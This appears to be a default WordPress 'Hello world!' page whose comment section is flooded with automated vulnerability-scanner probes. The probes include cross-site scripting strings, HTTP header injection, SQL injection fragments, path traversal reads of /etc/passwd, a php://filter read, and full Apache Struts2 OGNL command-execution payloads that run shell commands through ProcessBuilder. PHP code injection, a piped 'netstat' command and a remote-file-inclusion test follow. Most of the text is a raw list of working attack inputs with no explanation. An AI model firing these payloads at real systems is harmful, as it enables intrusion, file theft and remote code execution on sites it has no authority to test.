Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
44 thoughts on “Hello world!”
“‘>
_q=random(X140414570813248Y2_2Z)
‘ onEvent=X140414570813248Y2_2Z
” onEvent=X140414570813248Y2_2Z
javascript:qxss(X140414570813248Y2_2Z);
“>
1″‘>
z–>
1 _q_q=random(l8ncgM2p)
” SRC=//localhost/jke0Xmh6E>
“‘><qss1fFg8058=7;//<
1″>
BODY{background:url(“javascript:qssqg63Y9IO=7”)}
qss1GsnyPrA=7
%3cscript z%3e_q(y)%3c/script%3e
<script src=http://localhost/j
qss{{q=(2*2.0)}}qss
{{333*334}}
q
Content-Type:text/html
Content-Length: 190
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2
AA
q
Qualys_resp_hdr_injection: Vulnerable
q
Qualys_resp_hdr_injection: Vulnerable
qualyswasesi
1′
;–
#
/*
“
,
(
1e309
/../../../../../../../etc/passwd
../../../../../../../etc/passwd
//..//..//..//..//..//..//..//etc/passwd
//….//….//….//….//….//….//….//etc/passwd
../../../../../../../Windows/System32/drivers/etc/hosts
php://filter/read=string.rot13/resource=/etc/passwd
….//….//….//….//….//….//etc/passwd
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
a(){}phpinfo(); function a
|netstat -an
http://rfitest/